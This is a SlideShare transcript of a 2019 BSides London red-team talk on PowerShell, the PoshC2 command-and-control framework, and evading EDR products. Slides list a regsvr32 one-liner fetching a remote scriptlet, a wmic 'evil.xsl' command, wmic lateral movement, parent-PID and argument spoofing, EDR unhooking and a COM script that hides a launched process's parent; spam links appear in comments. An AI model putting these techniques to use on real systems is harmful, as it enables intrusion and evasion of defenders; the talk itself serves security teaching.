Successfully reported this slideshow.
We use your LinkedIn profile and activity data to personalize ads and to show you more relevant ads. You can change your ad preferences anytime.

powershell-is-dead-epic-learnings-london

1,036 views

Published on

BSidesLondon talk about Powershell is dead - Epic Learnings!

Published in: Internet
  • Beating The Odds Has Never Been Easier ... Watch how he does it ... ■■■ http://t.cn/A6hPRLE0
       Reply 
    Are you sure you want to  Yes  No
    Your message goes here
  • Create Your Own Odds Playing The Lottery ▲▲▲ https://tinyurl.com/t2onem4
       Reply 
    Are you sure you want to  Yes  No
    Your message goes here
  • https://www.youtube.com/watch?v=wIhlchiRmKQ
       Reply 
    Are you sure you want to  Yes  No
    Your message goes here
  • Be the first to like this

powershell-is-dead-epic-learnings-london

  1. 1. PowerShell is DEAD Epic Learnings June 2019
  2. 2. Contents Introductions + Whoami / Whoarewe What is PowerShell + Understand what PowerShell is / key components + Is it DEAD? Evolution of PoshC2 + Release timeline & changes EDR + History & challenges (offensive) + Future predictions June 2019
  3. 3. @benpturner + Managing Principal Security Consultant @ Nettitude + Lead the Global Red Team Operation @ Nettitude + 8 years as a Crest Team Leader (CHECK Team Leader - Infrastructure) + 4 years as a Crest Simulated Attack Specialist (CCSAS - STAR/CBEST) Training / Talks + Advanced Threat Actor Simulation - Red Team Training Course (Steelcon 2017/2018) + Workshops - Red Teaming with PoshC2 (BSides London/Manchester 2017) + Trusted Third Parties are NOT Trust Worthy (GiSEC Dubai 2019) - https://bit.ly/2I9ehIg + 21st Century War Stories (Steelcon/BSides 2016) - https://www.youtube.com/watch?v=O8Ul6QSPuo4 + PowerShell Fu with Metasploit (Steelcon/BSides 2015) - https://www.youtube.com/watch?v=ottfZFRSsj4 Development Projects + Lead developer of PoshC2 - Nettitude’s Open Source Command & Control (C2) Framework + General day to day PowerShell / C# projects & security research
  4. 4. @b4ggio_su + Principal Security Consultant @ Nettitude + A Red Team Lead in the Global Red Team Operation @ Nettitude + 16 years in IT: • 4 years as a sysadmin • 4 years in a defensive role • 8 years in an offensive role Training / Talks + Advanced Threat Actor Simulation - Red Team Training Course + Red Team & Stuff (Bsides Mcr 2018 / OWASP Warwick 2019)
  5. 5. @rbmaslen + Principal Security Consultant @ Nettitude + Red Teamer/Tools developer + 20 years in IT: • 14 years as a developer (mainly C++, C#, HTML/JS) • 6 years in an offensive role + CCT / CCSAM / OSCP / OSCE Training / Talks + Thick Client Destruction (Steelcon 2017) + COM and the PowerThIEf (Steelcon 2018) Development Projects + Contributor to PoshC2 - Nettitude’s Open Source Command & Control (C2) Framework + PowerThIEf, SharpSocks, C# portscanner & ArpScan
  6. 6. Team Spicy Weasel 1st Place - 2018 + labs.nettitude.com/blog/derbycon-2018-ctf-write-up 1st Place - 2017 + labs.nettitude.com/blog/derbycon-2017-ctf-write-up 3rd Place - 2016 + labs.nettitude.com/blog/derbycon-2016-ctf-write-up
  7. 7. What is PowerShell & is it DEAD? 1. The Microsoft binary - ”PowerShell.exe” 2. The DLL behind the binary ”System.Management.Automation.Dll” 3. The folder - C:WindowsSystem32WindowsPowerShellv1 .0 4. The version? Is PSv2 dead or only versions after 4 because of Transcript Logging, ScriptBlock Logging, Module Logging & AMSI Integration https://www.youtube.com/watch?v=IYD_aiQtVaE
  8. 8. Is PowerShell DEAD? Evolution of PoshC2
  9. 9. Evolution of PoshC2 2016 -> 2019  2016  June - v1.0 First Release of PoshC2 (Server/Implant in PowerShell)  Dec - v2.0 Released - C# GUI, Daisy Chaining & Portability  2017  Mar - v2.1 Removed C# GUI  May - PoshC2 Slack channel announced  July - PoshC2_Python Release  Oct – Reflective DLL / Shellcode Released  Nov - v3.0 Released with SharpSocks  2018  Feb - Readthedocs Documentation Released  July - v4.0 Released with Python Implant  2019  Jan - v4.8 Sharp Implant  Feb - Support for 2003/XP  June - SharpSocks Integration
  10. 10. PoshC2 – PowerShell Server
  11. 11. Process Listing – Initial Execution
  12. 12. Generic PowerShell Implant
  13. 13. Carbon Black / Tanium / EDR 1. This is probably the best query in carbon black to detect malicious activity: “process_name:powershell.exe” 2. Do a search across your estate and see how much this shows up…….
  14. 14. Carbon Black / Tanium / EDR 1. This is probably the best query in carbon black to detect malicious activity: “modload:system.management.automation.dll” “modload:system.management.automation.ni.dll” 2. Filter out “powershell.exe”, and others…… 3. Do a search across your estate and see how much this shows up…….
  15. 15. Defensive / Legacy Approach (Reactive)  Block powershell.exe on all endpoints  Only allow signed powershell scripts to be executed  Upgrade “powershell.exe” to v5.0 for greater visibility  Enable constrained mode to restrict language elements  Monitor for “System.Management.Automation.Dll” in processes  Integrate AMSI with AV vendor for early signature detection  Enable & Monitor ScriptBlock Logging for suspicious cmdlets  Enable & Monitor Transcript Logging for suspicious signatures  Enable & Monitor Module Logging for signatured modules Modern Approach (Proactive)
  16. 16. “ ” Is PowerShell DEAD
  17. 17. “ ” NO ITS NOT
  18. 18. “ ” APT33 according to FireEye
  19. 19. Supposedly Used by APT 33  Suspected attribution: Iran  Target sectors: Aerospace, energy  Overview: APT33 has targeted organizations, spanning multiple industries, headquartered in the U.S., Saudi Arabia and South Korea. APT33 has shown particular interest in organizations in the aviation sector involved in both military and commercial capacities, as well as organizations in the energy sector with ties to petrochemical production • https://www.fireeye.com/blog/threat- research/2018/12/overruled-containing-a-potentially- destructive-adversary.html • https://www.fireeye.com/blog/threat- research/2017/09/apt33-insights-into-iranian-cyber- espionage.html • https://www.fireeye.com/current-threats/apt- groups.html#apt33
  20. 20. Introducing C# Implant
  21. 21. PoshC2_Python
  22. 22. PoshC2_Python
  23. 23. C# Implant
  24. 24. C# Implant / Reflection
  25. 25. C# Implant / Reflection  loadmodule Seatbelt.exe  run-exe Seatbelt.Program Seatbelt all  run-exe Seatbelt.Program Seatbelt PowerShellSettings  run-dll Seatbelt.Program Seatbelt UserChecks
  26. 26. C# Reflection  foreach (var Ass in AppDomain.CurrentDomain.GetAssemblies())  run-exe loadedType.Assembly.EntryPoint.Invoke(null, new object[] { splitnewargs }).ToString();  run-dll loadedType.Assembly.GetType(qualifiedname).InvokeMember(s Method, BindingFlags.Public | BindingFlags.InvokeMethod | BindingFlags.Static, null, null, new object[] { splitnewargs }).ToString();
  27. 27. C# Reflection / OpSec Considerations
  28. 28. EDR / Next Gen AV
  29. 29. Example Vendors
  30. 30. Endpoint Detection and Response
  31. 31. Attacker Thoughts  Avoidance  Trickery  Partying with EDR
  32. 32. Avoidance
  33. 33. Avoidance - Carbon Black Detected – But why: RTFM!
  34. 34. Avoidance – Tanium Signal Definition image.path contains ‘system.management.automation’ AND process.path contains NOT ‘mscorsvw.exe’ AND process.path contains NOT ‘monitoringhost.exe’ AND process.path contains NOT ‘powershell.exe’ AND process.path contains NOT ‘powershell_ise.exe’ AND process.path contains NOT ‘sdiagnhost.exe’ AND process.path contains NOT ‘servermanager.exe’ AND process.path contains NOT ‘sqlps.exe’ AND process.path contains NOT ‘wsmprovhost.exe’ AND process.path contains NOT ‘Microsoft Azure AD SyncBinmiiserver.exe’ (Does require process tracing to be enabled in Tanium - quite heavy) Warning - Not doing a hash checksum on the processes or their location
  35. 35. Trickery
  36. 36. Parent PID Spoofing https://stackoverflow.com/questions/10554913/how-to-call-createprocess-with- startupinfoex-from-c-sharp-and-re-parent-the-ch
  37. 37. Parent PID Spoofing / Carbon Black
  38. 38. Detecting Parent Spoofing https://www.countercept.com/blog/detecting-parent-pid- spoofing/
  39. 39. Process Argument Spoofing
  40. 40. Process Argument Spoofing 1. Create a process suspended – Fake Arguments 2. Identify the PEB using NTQueryProcessInformation 3. Parse PEB and Commandline structure 4. Overwrite the Commandline arguments using WriteProcessMemory – Real Arguments 5. Resume the process
  41. 41. Process Argument Spoofing  https://github.com/FuzzySecurity/Sharp-Suite/tree/master/SwampThing  https://blog.xpnsec.com/how-to-argue-like-cobalt-strike/  https://blog.cobaltstrike.com/2019/01/02/cobalt-strike-3-13-why-do-we-argue/
  42. 42. Process Argument Spoofing – WHY? Execution  Powershell One Liner  regsvr32.exe /s /i:http://URL/file.sct scrobj.dll  wmic os get /FORMAT:”evil.xsl” Lateral Movement  SC COMPUTERNAME stop "SERVICENAME“  wmic.exe /node:<target> /user:<user> /password:"<password>" process call create "%Systemroot%Tempbatchfile.bat“
  43. 43. Partying with EDR
  44. 44. Partying With EDR Migration Basics - Win API Calls:  VirtualAllocEX  WriteProcessMemory  CreateRemoteThread http://deniable.org/misc/inject-all-the-things However there are many ways to do the same thing, quick examples: RtlCreateUserThread SetWindowsHookEx NtCreateThreadEx QueueUserAPC
  45. 45. “In computer programming, the term hooking covers a range of techniques used to alter or augment the behaviour of an operating system, of applications, or of other software components by intercepting function calls or messages or events passed between software components. Code that handles such intercepted function calls, events or messages is called a hook.” - Wikipedia What is Hooking?
  46. 46. EDR Hooking
  47. 47. Before EDR
  48. 48. After EDR
  49. 49. After EDR
  50. 50. Other EDR’s
  51. 51. Other EDR’s
  52. 52.  Re-Patch Memory to remove JMP to original code  Update the IAT table to point to the correct function  Create a stub – to carry out the same system calls  Free a number of API calls and use FreeLibrary to remove interfering DLL’s https://medium.com/@fsx30/bypass-edrs-memory-protection- introduction-to-hooking-2efb21acffd6 Bringing Back The Good Times
  53. 53. Demo
  54. 54. Demo
  55. 55. “ ” Becoming best mates with COM
  56. 56. COM Intro – just watch this https://vimeo.com/214856542
  57. 57.  Spoke about this at Steelcon last year, has proved really handy  Has been used to get past some EDRs  Breaks the attribution between process Migrating with COM into IE
  58. 58. The key to this? Junction folders  Junction folders, a technique leaked in the Vault 7 dumps  Forms the basis of Sandbox escapers recent IE 11 sandbox escape  After adding some registry keys allows code to be executed when you navigate to a folder
  59. 59. Junction folders
  60. 60. Loading the DLL in IE – first setup the registry
  61. 61.  If we can get a reference to an IE Windows we can call  URL needs to be in the format shell:::{<GUID>}  https://docs.microsoft.com/en-us/previous- versions/windows/internet-explorer/ie-developer/platform- apis/aa752094(v%3Dvs.85) How can we use that
  62. 62.  Great COM class allows you to enumerate all the current open IE & Explorer windows and automate them  Guess what you can then get them to navigate to a new location  https://msdn.microsoft.com/en- us/library/windows/desktop/bb773974(v=vs.85).aspx ShellWindows
  63. 63. Loading the DLL in IE, PowerShell $shellWinGuid = [System.Guid]::Parse("{9BA05972-F6A8-11CF-A442- 00A0C90A8F39}") $typeShwin = [System.Type]::GetTypeFromCLSID($shellWinGuid) $shwin = [System.Activator]::CreateInstance($typeShwin) $shWin[0].Navigate2("shell:::{56B6E39E-AB81-4E34-BC8B-99D1D28FB7E4}", 2048) /*CLSID must be in the format "shell:::{CLSID}" Second param 2048 is BrowserNavConstants value for navOpenInNewTab https://msdn.microsoft.com/en-us/library/dd565688(v=vs.85).aspx Further ideas on what payloads you may be able to use */
  64. 64. Weaponisable? Yes in VBA
  65. 65. Can you do this in VBA, yes of course
  66. 66. Can you do this in VBA, yes of course
  67. 67.  Only use Native DLL’s? thankfully not  Using CCW’s Com Callable Wrappers we can write a .net dll and configure the registry keys so that when navigated to we can launch a .net dll. Use this as a COM Hijack if you want.  No time to go into CCW in depth but have a read of https://docs.microsoft.com/en- us/dotnet/framework/interop/com-callable-wrapper  .Net is started in IE and loads the dll  We need a .net assembly with class that implements an interface and some registry keys COM Callable Wrapper
  68. 68. COM Callable Wrapper – Class Interface
  69. 69. Native dll’s only?
  70. 70. Getting the reg keys
  71. 71. Setting up the .net registry keys
  72. 72. Setting up the .net registry keys  Just make sure that you create or import the keys from a x64 application or use the explicit 64 bit key from the link below  https://docs.microsoft.com/en- us/windows/desktop/sysinfo/32-bit-and-64-bit-application- data-in-the-registry
  73. 73. Also guess what the IE shortcut now does?
  74. 74. One last thing – remember this script $shellWinGuid = [System.Guid]::Parse("{9BA05972-F6A8-11CF-A442- 00A0C90A8F39}") $typeShwin = [System.Type]::GetTypeFromCLSID($shellWinGuid) $shwin = [System.Activator]::CreateInstance($typeShwin) $shWin[0].Navigate2("shell:::{56B6E39E-AB81-4E34-BC8B-99D1D28FB7E4}", 2048) /*CLSID must be in the format "shell:::{CLSID}" Second param 2048 is BrowserNavConstants value for navOpenInNewTab https://msdn.microsoft.com/en-us/library/dd565688(v=vs.85).aspx Further ideas on what payloads you may be able to use */
  75. 75. Lets tweak it $shellWinGuid = [System.Guid]::Parse("{9BA05972-F6A8-11CF-A442- 00A0C90A8F39}") $typeShwin = [System.Type]::GetTypeFromCLSID($shellWinGuid) $shwin = [System.Activator]::CreateInstance($typeShwin) $shWin[0].Navigate("c:windowssystem32WindowsPowerShellv1.0powers hell.exe")
  76. 76. Running it (must have at least 1 explorer window open)
  77. 77. Look who the parent is?
  78. 78. EDR Summary  EDR is not a silver bullet  Does give incredible visibility to the Blue Team  Highly recommended as a complimentary piece to the defensive strategy but should not be solely relied on  Does not replace good people with experience  Constant Cat and Mouse game
  79. 79. Future Predictions 1. Over reliance on EDR, especially on user endpoints and not server land or non Windows Systems 2. Customers focussing all attention on tertiary endpoints and not on critical functions or sensitive customer data 3. Move to Zerotrust networks and MFA everywhere 4. Machine Learning – Investment into Process & Procedures 5. C2 frameworks moving to C++ base code – Could see MSF be revived for red teaming 6. All standard AV/EDR vendors adopting in memory scanning / AMSI 7. Windows 7 is EOL January 2020 – not a prediction but a reality 8. Windows 10 removal of .NET v2 – not a prediction but a reality 9. People going back to single executables running either C++ or C# code to evade LOLBAS signatures (LOLBAS vs arbitrary exe)
  80. 80. Future Predictions 1. Over reliance on EDR, especially on endpoints and not server land (or unix really) 2. C2 frameworks moving to C++ base code – Could see MSF be revived for RT 3. We already have this level of capability and its interesting what gets detected and what does not 4. All standard AV/EDR vendors adopting in memory scanning 5. Windows 7 is EOL January 2020 – not a prediction but a massive jump 6. Windows 10 removal of .NET v2 7. People going back to single executables running either c++ or c# code to evade lolbins signatures and
  81. 81. THANK YOU Ben Turner @benpturner Doug McLeod @b4ggio_su Rob Maslen @rbmaslen https://www.steelcon.info/training/ https://www.slideshare.net/nettitude_labs/powershell-is-dead-epic-learning

×